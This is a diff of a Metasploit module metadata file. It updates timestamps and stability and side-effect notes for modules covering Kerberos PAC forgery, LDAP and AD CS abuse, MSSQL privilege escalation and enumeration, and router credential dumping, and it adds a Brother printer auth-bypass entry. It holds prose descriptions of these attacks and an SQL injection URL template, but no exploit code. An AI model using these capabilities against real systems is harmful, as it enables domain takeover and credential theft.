- "description": "This module exploits a vulnerability in the Microsoft Kerberos implementation. The problem\n exists in the verification of the Privilege Attribute Certificate (PAC) from a Kerberos TGS\n request, where a domain user may forge a PAC with arbitrary privileges, including\n Domain Administrator. This module requests a TGT ticket with a forged PAC and exports it to\n a MIT Kerberos Credential Cache file. It can be loaded on Windows systems with the Mimikatz\n help. It has been tested successfully on Windows 2008.",
+ "description": "This module exploits a vulnerability in the Microsoft Kerberos implementation. The problem\n exists in the verification of the Privilege Attribute Certificate (PAC) from a Kerberos TGS\n request, where a domain user may forge a PAC with arbitrary privileges, including\n Domain Administrator. This module requests a TGT ticket with a forged PAC and exports it to\n a MIT Kerberos Credential Cache file. It can be loaded on Windows systems with the Mimikatz\n help. It has been tested successfully on Windows 2008.",
"references": [
"CVE-2014-6324",
"MSB-MS14-068",
"OSVDB-114751",
"URL-http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx",
"URL-https://labs.mwrinfosecurity.com/blog/2014/12/16/digging-into-ms14-068-exploitation-and-defence/",
- "URL-https://github.com/bidord/pykek",
+ "URL-http://web.archive.org/web/20180107213459/https://github.com/bidord/pykek",
"URL-https://www.rapid7.com/blog/post/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit"
],
"platform": "",
"arch": "",
"rport": 88,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2023-01-27 09:11:43 +0000",
+ "mod_time": "2025-06-02 16:04:42 +0000",
"path": "/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb",
"is_install_path": true,
"ref_name": "admin/kerberos/ms14_068_kerberos_checksum",
@@ -6710,19 +6796,25 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "AKA": [
+ "ESKIMOROLL"
+ ],
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/kerberos/ticket_converter": {
"name": "Kerberos ticket converter",
"fullname": "auxiliary/admin/kerberos/ticket_converter",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -6741,14 +6833,10 @@
"platform": "",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2022-09-28 22:28:54 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/kerberos/ticket_converter.rb",
"is_install_path": true,
"ref_name": "admin/kerberos/ticket_converter",
@@ -6757,27 +6845,19 @@
"default_credential": false,
"notes": {
"Stability": [
-
- ],
- "Reliability": [
-
+ "crash-safe"
],
- "SideEffects": [
-
- ]
+ "Reliability": [],
+ "SideEffects": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/ldap/ad_cs_cert_template": {
"name": "AD CS Certificate Template Management",
"fullname": "auxiliary/admin/ldap/ad_cs_cert_template",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -6789,20 +6869,17 @@
],
"description": "This module can create, read, update, and delete AD CS certificate templates from a Active Directory Domain\n Controller.\n\n The READ, UPDATE, and DELETE actions will write a copy of the certificate template to disk that can be\n restored using the CREATE or UPDATE actions. The CREATE and UPDATE actions require a certificate template data\n file to be specified to define the attributes. Template data files are provided to create a template that is\n vulnerable to ESC1, ESC2, ESC3 and ESC15.\n\n This module is capable of exploiting ESC4.",
"references": [
+ "URL-https://posts.specterops.io/certified-pre-owned-d95910965cd2",
"URL-https://github.com/GhostPack/Certify",
"URL-https://github.com/ly4k/Certipy"
],
"platform": "",
"arch": "",
"rport": 389,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2025-02-13 16:46:31 +0000",
+ "mod_time": "2025-07-15 17:20:36 +0000",
"path": "/modules/auxiliary/admin/ldap/ad_cs_cert_template.rb",
"is_install_path": true,
"ref_name": "admin/ldap/ad_cs_cert_template",
@@ -6810,15 +6887,11 @@
"post_auth": false,
"default_credential": false,
"notes": {
- "Stability": [
-
- ],
+ "Stability": [],
"SideEffects": [
"config-changes"
],
- "Reliability": [
-
- ],
+ "Reliability": [],
"AKA": [
"Certifry",
"Certipy"
@@ -6850,9 +6923,7 @@
"auxiliary_admin/ldap/change_password": {
"name": "Change Password",
"fullname": "auxiliary/admin/ldap/change_password",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -6867,14 +6938,10 @@
"platform": "",
"arch": "",
"rport": 389,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2024-12-06 16:47:25 +0000",
+ "mod_time": "2025-05-28 10:19:30 +0000",
"path": "/modules/auxiliary/admin/ldap/change_password.rb",
"is_install_path": true,
"ref_name": "admin/ldap/change_password",
@@ -6882,15 +6949,11 @@
"post_auth": true,
"default_credential": false,
"notes": {
- "Stability": [
-
- ],
+ "Stability": [],
"SideEffects": [
"ioc-in-logs"
],
- "Reliability": [
-
- ]
+ "Reliability": []
},
"session_types": [
"ldap"
@@ -6910,9 +6973,7 @@
"auxiliary_admin/ldap/rbcd": {
"name": "Role Base Constrained Delegation",
"fullname": "auxiliary/admin/ldap/rbcd",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -6930,30 +6991,22 @@
"platform": "",
"arch": "",
"rport": 389,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2025-02-13 16:46:31 +0000",
+ "mod_time": "2025-06-23 18:39:19 +0000",
"path": "/modules/auxiliary/admin/ldap/rbcd.rb",
"is_install_path": true,
"ref_name": "admin/ldap/rbcd",
- "check": false,
+ "check": true,
"post_auth": false,
"default_credential": false,
"notes": {
- "Stability": [
-
- ],
+ "Stability": [],
"SideEffects": [
"config-changes"
],
- "Reliability": [
-
- ]
+ "Reliability": []
},
"session_types": [
"ldap"
@@ -6981,9 +7034,7 @@
"auxiliary_admin/ldap/shadow_credentials": {
"name": "Shadow Credentials",
"fullname": "auxiliary/admin/ldap/shadow_credentials",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -6999,30 +7050,22 @@
"platform": "",
"arch": "",
"rport": 389,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2024-05-02 13:57:13 +0000",
+ "mod_time": "2025-06-23 18:39:19 +0000",
"path": "/modules/auxiliary/admin/ldap/shadow_credentials.rb",
"is_install_path": true,
"ref_name": "admin/ldap/shadow_credentials",
- "check": false,
+ "check": true,
"post_auth": true,
"default_credential": false,
"notes": {
- "Stability": [
-
- ],
+ "Stability": [],
"SideEffects": [
"config-changes"
],
- "Reliability": [
-
- ]
+ "Reliability": []
},
"session_types": [
"ldap"
@@ -7050,9 +7093,7 @@
"auxiliary_admin/ldap/vmware_vcenter_vmdir_auth_bypass": {
"name": "VMware vCenter Server vmdir Authentication Bypass",
"fullname": "auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2020-04-09",
"type": "auxiliary",
@@ -7072,14 +7113,10 @@
"platform": "",
"arch": "",
"rport": 636,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2024-05-02 13:57:13 +0000",
+ "mod_time": "2025-05-28 09:23:36 +0000",
"path": "/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.rb",
"is_install_path": true,
"ref_name": "admin/ldap/vmware_vcenter_vmdir_auth_bypass",
@@ -7094,9 +7131,7 @@
"ioc-in-logs",
"config-changes"
],
- "Reliability": [
-
- ]
+ "Reliability": []
},
"session_types": [
"ldap"
@@ -7112,9 +7147,7 @@
"auxiliary_admin/maxdb/maxdb_cons_exec": {
"name": "SAP MaxDB cons.exe Remote Command Injection",
"fullname": "auxiliary/admin/maxdb/maxdb_cons_exec",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2008-01-09",
"type": "auxiliary",
@@ -7130,34 +7163,90 @@
"platform": "",
"arch": "",
"rport": 7210,
+ "autofilter_ports": [],
+ "autofilter_services": [],
+ "targets": null,
+ "mod_time": "2025-05-21 08:32:40 +0000",
+ "path": "/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb",
+ "is_install_path": true,
+ "ref_name": "admin/maxdb/maxdb_cons_exec",
+ "check": false,
+ "post_auth": false,
+ "default_credential": false,
+ "notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
+ },
+ "session_types": false,
+ "needs_cleanup": false,
+ "actions": []
+ },
+ "auxiliary_admin/misc/brother_default_admin_auth_bypass_cve_2024_51978": {
+ "name": "Multiple Brother devices authentication bypass via default administrator password generation",
+ "fullname": "auxiliary/admin/misc/brother_default_admin_auth_bypass_cve_2024_51978",
+ "aliases": [],
+ "rank": 300,
+ "disclosure_date": "2025-06-25",
+ "type": "auxiliary",
+ "author": [
+ "sfewer-r7"
+ ],
+ "description": "By leaking a target devices serial number, a remote attacker can generate the target devices default\n administrator password. The target device may leak its serial number via unauthenticated HTTP, HTTPS, IPP,\n SNMP, or PJL requests.",
+ "references": [
+ "CVE-2024-51977",
+ "CVE-2024-51978",
+ "URL-https://support.brother.com/g/b/link.aspx?prod=group2&faqid=faq00100846_000",
+ "URL-https://support.brother.com/g/b/link.aspx?prod=group2&faqid=faq00100848_000",
+ "URL-https://support.brother.com/g/b/link.aspx?prod=lmgroup1&faqid=faqp00100620_000",
+ "URL-https://www.rapid7.com/blog/post/multiple-brother-devices-multiple-vulnerabilities-fixed",
+ "URL-https://github.com/sfewer-r7/BrotherVulnerabilities"
+ ],
+ "platform": "",
+ "arch": "",
+ "rport": 443,
"autofilter_ports": [
-
+ 80,
+ 8080,
+ 443,
+ 8000,
+ 8888,
+ 8880,
+ 8008,
+ 3000,
+ 8443
],
"autofilter_services": [
-
+ "http",
+ "https"
],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
- "path": "/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb",
+ "mod_time": "2025-07-09 14:59:54 +0000",
+ "path": "/modules/auxiliary/admin/misc/brother_default_admin_auth_bypass_cve_2024_51978.rb",
"is_install_path": true,
- "ref_name": "admin/maxdb/maxdb_cons_exec",
+ "ref_name": "admin/misc/brother_default_admin_auth_bypass_cve_2024_51978",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/misc/sercomm_dump_config": {
"name": "SerComm Device Configuration Dump",
"fullname": "auxiliary/admin/misc/sercomm_dump_config",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2013-12-31",
"type": "auxiliary",
@@ -7165,7 +7254,7 @@
"Eloi Vanderbeken ",
"Matt \"hostess\" Andreko "
],
- "description": "This module will dump the configuration of several SerComm devices. These devices\n typically include routers from NetGear and Linksys. This module was tested\n successfully against the NetGear DG834 series ADSL modem router.",
+ "description": "This module will dump the configuration of several SerComm devices. These devices\n typically include routers from NetGear and Linksys. This module was tested\n successfully against the NetGear DG834 series ADSL modem router.",
"references": [
"OSVDB-101653",
"URL-https://github.com/elvanderb/TCP-32764"
@@ -7173,14 +7262,10 @@
"platform": "",
"arch": "",
"rport": 32764,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2024-01-07 15:02:53 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/misc/sercomm_dump_config.rb",
"is_install_path": true,
"ref_name": "admin/misc/sercomm_dump_config",
@@ -7188,40 +7273,37 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/misc/wol": {
"name": "UDP Wake-On-Lan (WOL)",
"fullname": "auxiliary/admin/misc/wol",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"sinn3r "
],
- "description": "This module will turn on a remote machine with a network card that\n supports wake-on-lan (or MagicPacket). In order to use this, you must\n know the machine's MAC address in advance. The current default MAC\n address is just an example of how your input should look like.\n\n The password field is optional. If present, it should be in this hex\n format: 001122334455, which is translated to \"0x001122334455\" in binary.\n Note that this should be either 4 or 6 bytes long.",
- "references": [
-
- ],
+ "description": "This module will turn on a remote machine with a network card that\n supports wake-on-lan (or MagicPacket). In order to use this, you must\n know the machine's MAC address in advance. The current default MAC\n address is just an example of how your input should look like.\n\n The password field is optional. If present, it should be in this hex\n format: 001122334455, which is translated to \"0x001122334455\" in binary.\n Note that this should be either 4 or 6 bytes long.",
+ "references": [],
"platform": "",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2019-03-05 04:43:37 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/misc/wol.rb",
"is_install_path": true,
"ref_name": "admin/misc/wol",
@@ -7229,26 +7311,27 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/motorola/wr850g_cred": {
"name": "Motorola WR850G v4.03 Credentials",
"fullname": "auxiliary/admin/motorola/wr850g_cred",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2004-09-24",
"type": "auxiliary",
"author": [
"kris katterjohn "
],
- "description": "Login credentials to the Motorola WR850G router with\n firmware v4.03 can be obtained via a simple GET request\n if issued while the administrator is logged in. A lot\n more information is available through this request, but\n you can get it all and more after logging in.",
+ "description": "Login credentials to the Motorola WR850G router with\n firmware v4.03 can be obtained via a simple GET request\n if issued while the administrator is logged in. A lot\n more information is available through this request, but\n you can get it all and more after logging in.",
"references": [
"CVE-2004-1550",
"OSVDB-10232",
@@ -7257,14 +7340,10 @@
"platform": "",
"arch": "",
"rport": 80,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/motorola/wr850g_cred.rb",
"is_install_path": true,
"ref_name": "admin/motorola/wr850g_cred",
@@ -7272,19 +7351,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/ms/ms08_059_his2006": {
"name": "Microsoft Host Integration Server 2006 Command Execution Vulnerability",
"fullname": "auxiliary/admin/ms/ms08_059_his2006",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2008-10-14",
"type": "auxiliary",
@@ -7301,14 +7381,10 @@
"platform": "",
"arch": "",
"rport": 0,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/ms/ms08_059_his2006.rb",
"is_install_path": true,
"ref_name": "admin/ms/ms08_059_his2006",
@@ -7316,29 +7392,30 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/mssql/mssql_enum": {
"name": "Microsoft SQL Server Configuration Enumerator",
"fullname": "auxiliary/admin/mssql/mssql_enum",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Carlos Perez "
],
- "description": "This module will perform a series of configuration audits and\n security checks against a Microsoft SQL Server database. For this\n module to work, valid administrative user credentials must be\n supplied.",
- "references": [
-
- ],
+ "description": "This module will perform a series of configuration audits and\n security checks against a Microsoft SQL Server database. For this\n module to work, valid administrative user credentials must be\n supplied.",
+ "references": [],
"platform": "",
"arch": "",
"rport": 1433,
@@ -7357,7 +7434,7 @@
"sybase"
],
"targets": null,
- "mod_time": "2024-03-05 13:27:00 +0000",
+ "mod_time": "2025-06-20 13:20:44 +0000",
"path": "/modules/auxiliary/admin/mssql/mssql_enum.rb",
"is_install_path": true,
"ref_name": "admin/mssql/mssql_enum",
@@ -7365,21 +7442,24 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": [
"mssql"
],
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/mssql/mssql_enum_domain_accounts": {
"name": "Microsoft SQL Server SUSER_SNAME Windows Domain Account Enumeration",
"fullname": "auxiliary/admin/mssql/mssql_enum_domain_accounts",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -7387,7 +7467,7 @@
"nullbind ",
"antti "
],
- "description": "This module can be used to bruteforce RIDs associated with the domain of the SQL Server\n using the SUSER_SNAME function. This is similar to the smb_lookupsid module, but executed\n through SQL Server queries as any user with the PUBLIC role (everyone). Information that\n can be enumerated includes Windows domain users, groups, and computer accounts. Enumerated\n accounts can then be used in online dictionary attacks.",
+ "description": "This module can be used to bruteforce RIDs associated with the domain of the SQL Server\n using the SUSER_SNAME function. This is similar to the smb_lookupsid module, but executed\n through SQL Server queries as any user with the PUBLIC role (everyone). Information that\n can be enumerated includes Windows domain users, groups, and computer accounts. Enumerated\n accounts can then be used in online dictionary attacks.",
"references": [
"URL-https://docs.microsoft.com/en-us/sql/t-sql/functions/suser-sname-transact-sql"
],
@@ -7409,7 +7489,7 @@
"sybase"
],
"targets": null,
- "mod_time": "2024-02-19 10:57:53 +0000",
+ "mod_time": "2025-05-17 13:21:09 +0000",
"path": "/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts.rb",
"is_install_path": true,
"ref_name": "admin/mssql/mssql_enum_domain_accounts",
@@ -7417,19 +7497,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/mssql/mssql_enum_domain_accounts_sqli": {
"name": "Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration",
"fullname": "auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -7437,7 +7520,7 @@
"nullbind ",
"antti "
],
- "description": "This module can be used to bruteforce RIDs associated with the domain of the SQL Server\n using the SUSER_SNAME function via Error Based SQL injection. This is similar to the\n smb_lookupsid module, but executed through SQL Server queries as any user with the PUBLIC\n role (everyone). Information that can be enumerated includes Windows domain users, groups,\n and computer accounts. Enumerated accounts can then be used in online dictionary attacks.\n The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];--",
+ "description": "This module can be used to bruteforce RIDs associated with the domain of the SQL Server\n using the SUSER_SNAME function via Error Based SQL injection. This is similar to the\n smb_lookupsid module, but executed through SQL Server queries as any user with the PUBLIC\n role (everyone). Information that can be enumerated includes Windows domain users, groups,\n and computer accounts. Enumerated accounts can then be used in online dictionary attacks.\n The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];--",
"references": [
"URL-https://docs.microsoft.com/en-us/sql/t-sql/functions/suser-sname-transact-sql"
],
@@ -7460,7 +7543,7 @@
"https"
],
"targets": null,
- "mod_time": "2022-01-23 15:28:32 +0000",
+ "mod_time": "2025-05-17 13:21:09 +0000",
"path": "/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb",
"is_install_path": true,
"ref_name": "admin/mssql/mssql_enum_domain_accounts_sqli",
@@ -7468,26 +7551,29 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/mssql/mssql_enum_sql_logins": {
"name": "Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration",
"fullname": "auxiliary/admin/mssql/mssql_enum_sql_logins",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"nullbind "
],
- "description": "This module can be used to obtain a list of all logins from a SQL Server with any login.\n Selecting all of the logins from the master..syslogins table is restricted to sysadmins.\n However, logins with the PUBLIC role (everyone) can quickly enumerate all SQL Server\n logins using the SUSER_SNAME function by fuzzing the principal_id parameter. This is\n pretty simple, because the principal IDs assigned to logins are incremental. Once logins\n have been enumerated they can be verified via sp_defaultdb error analysis. This is\n important, because not all of the principal IDs resolve to SQL logins (some resolve to\n roles instead). Once logins have been enumerated, they can be used in dictionary attacks.",
+ "description": "This module can be used to obtain a list of all logins from a SQL Server with any login.\n Selecting all of the logins from the master..syslogins table is restricted to sysadmins.\n However, logins with the PUBLIC role (everyone) can quickly enumerate all SQL Server\n logins using the SUSER_SNAME function by fuzzing the principal_id parameter. This is\n pretty simple, because the principal IDs assigned to logins are incremental. Once logins\n have been enumerated they can be verified via sp_defaultdb error analysis. This is\n important, because not all of the principal IDs resolve to SQL logins (some resolve to\n roles instead). Once logins have been enumerated, they can be used in dictionary attacks.",
"references": [
"URL-https://docs.microsoft.com/en-us/sql/t-sql/functions/suser-sname-transact-sql"
],
@@ -7509,7 +7595,7 @@
"sybase"
],
"targets": null,
- "mod_time": "2023-12-12 09:53:37 +0000",
+ "mod_time": "2025-05-17 13:21:09 +0000",
"path": "/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb",
"is_install_path": true,
"ref_name": "admin/mssql/mssql_enum_sql_logins",
@@ -7517,26 +7603,29 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/mssql/mssql_escalate_dbowner": {
"name": "Microsoft SQL Server Escalate Db_Owner",
"fullname": "auxiliary/admin/mssql/mssql_escalate_dbowner",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"nullbind "
],
- "description": "This module can be used to escalate privileges to sysadmin if the user has\n the db_owner role in a trustworthy database owned by a sysadmin user. Once\n the user has the sysadmin role the msssql_payload module can be used to obtain\n a shell on the system.",
+ "description": "This module can be used to escalate privileges to sysadmin if the user has\n the db_owner role in a trustworthy database owned by a sysadmin user. Once\n the user has the sysadmin role the msssql_payload module can be used to obtain\n a shell on the system.",
"references": [
"URL-http://technet.microsoft.com/en-us/library/ms188676(v=sql.105).aspx"
],
@@ -7558,7 +7647,7 @@
"sybase"
],
"targets": null,
- "mod_time": "2024-03-05 13:27:00 +0000",
+ "mod_time": "2025-05-17 13:21:09 +0000",
"path": "/modules/auxiliary/admin/mssql/mssql_escalate_dbowner.rb",
"is_install_path": true,
"ref_name": "admin/mssql/mssql_escalate_dbowner",
@@ -7566,28 +7655,31 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": [
"mssql"
],
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/mssql/mssql_escalate_dbowner_sqli": {
"name": "Microsoft SQL Server SQLi Escalate Db_Owner",
"fullname": "auxiliary/admin/mssql/mssql_escalate_dbowner_sqli",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"nullbind "
],
- "description": "This module can be used to escalate SQL Server user privileges to sysadmin through a web\n SQL Injection. In order to escalate, the database user must to have the db_owner role in\n a trustworthy database owned by a sysadmin user. Once the database user has the sysadmin\n role, the mssql_payload_sqli module can be used to obtain a shell on the system.\n\n The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];--",
+ "description": "This module can be used to escalate SQL Server user privileges to sysadmin through a web\n SQL Injection. In order to escalate, the database user must to have the db_owner role in\n a trustworthy database owned by a sysadmin user. Once the database user has the sysadmin\n role, the mssql_payload_sqli module can be used to obtain a shell on the system.\n\n The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];--",
"references": [
"URL-http://technet.microsoft.com/en-us/library/ms188676(v=sql.105).aspx"
],
@@ -7610,7 +7702,7 @@
"https"
],
"targets": null,
- "mod_time": "2020-09-22 02:56:51 +0000",
+ "mod_time": "2025-05-17 13:21:09 +0000",
"path": "/modules/auxiliary/admin/mssql/mssql_escalate_dbowner_sqli.rb",
"is_install_path": true,
"ref_name": "admin/mssql/mssql_escalate_dbowner_sqli",
@@ -7618,26 +7710,29 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/mssql/mssql_escalate_execute_as": {
"name": "Microsoft SQL Server Escalate EXECUTE AS",
"fullname": "auxiliary/admin/mssql/mssql_escalate_execute_as",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"nullbind "
],
- "description": "This module can be used escalate privileges if the IMPERSONATION privilege has been\n assigned to the user. In most cases, this results in additional data access, but in\n some cases it can be used to gain sysadmin privileges.",
+ "description": "This module can be used escalate privileges if the IMPERSONATION privilege has been\n assigned to the user. In most cases, this results in additional data access, but in\n some cases it can be used to gain sysadmin privileges.",
"references": [
"URL-http://msdn.microsoft.com/en-us/library/ms178640.aspx"
],
@@ -7659,7 +7754,7 @@
"sybase"
],
"targets": null,
- "mod_time": "2024-03-05 13:27:00 +0000",
+ "mod_time": "2025-05-17 13:21:09 +0000",
"path": "/modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb",
"is_install_path": true,
"ref_name": "admin/mssql/mssql_escalate_execute_as",
@@ -7667,28 +7762,31 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": [
"mssql"
],
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/mssql/mssql_escalate_execute_as_sqli": {
"name": "Microsoft SQL Server SQLi Escalate Execute AS",
"fullname": "auxiliary/admin/mssql/mssql_escalate_execute_as_sqli",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"nullbind "
],
- "description": "This module can be used escalate privileges if the IMPERSONATION privilege has been\n assigned to the user via error based SQL injection. In most cases, this results in\n additional data access, but in some cases it can be used to gain sysadmin privileges.\n The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];--",
+ "description": "This module can be used escalate privileges if the IMPERSONATION privilege has been\n assigned to the user via error based SQL injection. In most cases, this results in\n additional data access, but in some cases it can be used to gain sysadmin privileges.\n The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];--",
"references": [
"URL-http://msdn.microsoft.com/en-us/library/ms178640.aspx"
],
@@ -7711,7 +7809,7 @@
"https"
],
"targets": null,
- "mod_time": "2020-09-22 02:56:51 +0000",
+ "mod_time": "2025-05-17 13:21:09 +0000",
"path": "/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb",
"is_install_path": true,
"ref_name": "admin/mssql/mssql_escalate_execute_as_sqli",
@@ -7719,19 +7817,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
